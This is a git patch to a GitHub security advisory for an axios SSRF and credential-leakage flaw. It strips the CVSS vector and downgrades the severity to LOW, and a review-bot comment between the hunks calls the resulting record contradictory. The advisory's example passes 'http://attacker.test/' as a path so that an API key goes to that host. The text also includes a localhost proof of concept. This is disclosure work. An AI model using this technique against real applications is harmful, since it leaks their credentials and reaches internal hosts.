From 590a73f9f6eb683ec9335862207765925f1fe8d3 Mon Sep 17 00:00:00 2001
From: vvalekk <129195766+vvalekk@users.noreply.github.com>
Date: Mon, 31 Mar 2025 15:24:23 +0200
Subject: [PATCH] Improve GHSA-jr5f-v2jv-69x6

---
 .../03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json | 11 +++--------
 1 file changed, 3 insertions(+), 8 deletions(-)

diff --git a/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json b/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json
index 66d8b94de3a58..4f74f02bf3c7c 100644
--- a/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json
+++ b/advisories/github-reviewed/2025/03/GHSA-jr5f-v2jv-69x6/GHSA-jr5f-v2jv-69x6.json
@@ -1,19 +1,14 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-jr5f-v2jv-69x6",
- "modified": "2025-03-28T14:57:51Z",
+ "modified": "2025-03-28T14:57:53Z",
 "published": "2025-03-07T15:16:00Z",
 "aliases": [
 "CVE-2025-27152"
 ],
 "summary": "axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL",
 "details": "### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).\nReference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n baseURL: \"http://example.test/api/v1/users/\",\n headers: {\n \"X-API-KEY\": \"1234567890\",\n },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" > /tmp/server1/index.html \necho \"this is server2\" > /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 &\npython -m http.server -d /tmp/server2 10002 &\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.",
- "severity": [
- {
- "type": "CVSS_V4",
- "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"
- }
- ],
+ "severity": [],
 "affected": [
 {
 "package": {
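Review bot: Replacing the CVSS 4.0 entry with `"severity": []` removes the advisory's only machine-readable score, while the second hunk (`@@ -92,7 +87,7 @@`) lowers the `database_specific` `"severity"` from `"HIGH"` to `"LOW"`, so OSV-style consumers that rate by CVSS vector now see no rating at all and those that read the GitHub label see LOW with nothing to reconcile it against. The unchanged `details` text still describes API-key leakage to a third-party host and SSRF against internal hosts, and `"CWE-918"` is retained, so the record now reads as internally contradictory. If the re-assessment is that the issue only materialises when an application forwards untrusted input as the request path (a precondition rather than a flaw in every `baseURL` user), that is better expressed as a corrected CVSS vector in the `severity` array than as an empty one, so that the qualitative label and the vector are derivable from each other. The commit subject `Improve GHSA-jr5f-v2jv-69x6` gives no rationale for the downgrade; recording it in the description would let downstream maintainers audit the change. The `modified` bump to `2025-03-28T14:57:53Z` appears tool-generated and needs no action.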
@@ -92,7 +87,7 @@
 "cwe_ids": [
 "CWE-918"
 ],
- "severity": "HIGH",
+ "severity": "LOW",
 "github_reviewed": true,
 "github_reviewed_at": "2025-03-07T15:16:00Z",
 "nvd_published_at": "2025-03-07T16:15:38Z"